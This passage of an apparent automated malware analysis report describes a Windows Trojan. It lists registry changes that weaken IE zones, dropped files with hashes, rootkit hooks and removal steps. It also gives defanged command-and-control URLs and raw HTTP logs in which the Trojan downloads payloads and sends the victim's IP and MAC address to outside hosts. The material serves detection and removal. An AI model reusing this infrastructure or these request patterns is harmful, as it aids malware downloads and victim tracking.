"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 E3 22 63 02 25 39 AD A1 3E C2 E1 1A 86 45 50"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ndislib.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 B7 C4 21 DA 26 5B B7 48 09 01 EF 15 6D 02 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\uo2zITM\Security]
[HKLM\System\CurrentControlSet\Services\uo2zITM]
[HKLM\System\CurrentControlSet\Services\uo2zITM\Enum]
Dropped PE files
MD5 | File path |
---|---|
ac26e6f812162a024170cb017e6da5c8 | c:\WINDOWS\HpE\hdptlk.exe |
eba2283a18b7a9e89bf308a9e5e1608c | c:\WINDOWS\HpE\sys32\urlnav.dll |
fc2c1ce99b49f7ac04ef3ff570061ae9 | c:\WINDOWS\system32\LQdhJ\yYJSx.exe |
d70c6fba5055c9f030553d69ca959ef1 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwCreateSection
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)
%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)
%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)
%WinDir%\HpE\sys32\services.exe (3904 bytes)
%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)
%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 455174 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 462848 | 2431724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 2895872 | 207240 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp0 | 3104768 | 966430 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 4071424 | 3871300 | 3874816 | 5.44825 | 0c41f9724bee2aaa564195d102c256f0 |
.rsrc | 7946240 | 5744 | 8192 | 1.90322 | 200729e9e76fca5d3157a990fafb7b96 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://update.down123.net/tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 | 115.28.45.16 |
hxxp://update.down123.net/deploy.php?ConFig=xz9 | 115.28.45.16 |
hxxp://1st.ecoma.ourwebpic.com/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 | |
hxxp://ln.p2ptool.com/txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 | 60.18.147.37 |
hxxp://plus.zzinfor.cn/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 | 203.130.58.30 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:49 GMT
Content-Type: text/plain
Content-Length: 324428
Last-Modified: Tue, 10 Nov 2015 11:43:50 GMT
Connection: close
ETag: "5641d876-4f34c"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:46 GMT
Content-Type: text/plain
Content-Length: 141392
Last-Modified: Fri, 06 Nov 2015 14:52:41 GMT
Connection: close
ETag: "563cbeb9-22850"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:39 GMT
Content-Type: text/plain
Content-Length: 17808
Last-Modified: Fri, 06 Nov 2015 14:52:13 GMT
Connection: close
ETag: "563cbe9d-4590"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 1840480
Last-Modified: Wed, 30 Sep 2015 02:45:35 GMT
Connection: close
ETag: "560b4ccf-1c1560"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 111968
Last-Modified: Tue, 22 Sep 2015 02:26:44 GMT
Connection: close
ETag: "5600bc64-1b560"
Accept-Ranges: bytes
<<< skipped >>>
GET /tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html; charset=gb2312
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 1
1....
GET /deploy.php?ConFig=xz9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: update.down123.net
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
Date: Wed, 11 Nov 2015 11:17:50 GMT
Content-Length: 2
9e
GET /txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:41 GMT
Content-Type: text/plain
Content-Length: 433608
Last-Modified: Fri, 06 Nov 2015 14:22:14 GMT
Connection: close
ETag: "563cb796-69dc8"
Accept-Ranges: bytes
<<< skipped >>>
GET /plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: plus.zzinfor.cn
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 11 Nov 2015 11:18:03 GMT
Server: Tengine/2.0.3
Content-Type: application/octet-stream
Content-Length: 1549
Expires: Wed, 11 Nov 2015 11:18:03 GMT
Cache-Control: max-age=0
X-Via: 1.1 bl15:2 (Cdn Cache Server V2.0)
Connection: close
<<< skipped >>>
GET /txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 3681632
Last-Modified: Wed, 11 Nov 2015 06:37:41 GMT
Connection: close
ETag: "5642e235-382d60"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:56 GMT
Content-Type: text/plain
Content-Length: 1594720
Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT
Connection: close
ETag: "553df2f0-185560"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:48 GMT
Content-Type: text/plain
Content-Length: 2198880
Last-Modified: Thu, 18 Jun 2015 01:46:51 GMT
Connection: close
ETag: "5582230b-218d60"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:34 GMT
Content-Type: text/plain
Content-Length: 247176
Last-Modified: Wed, 04 Nov 2015 14:11:46 GMT
Connection: close
ETag: "563a1222-3c588"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 684044
Last-Modified: Wed, 24 Jun 2015 10:44:45 GMT
Connection: close
ETag: "558a8a1d-a700c"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 185696
Last-Modified: Tue, 19 May 2015 04:05:51 GMT
Connection: close
ETag: "555ab69f-2d560"
Accept-Ranges: bytes
<<< skipped >>>
GET /txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
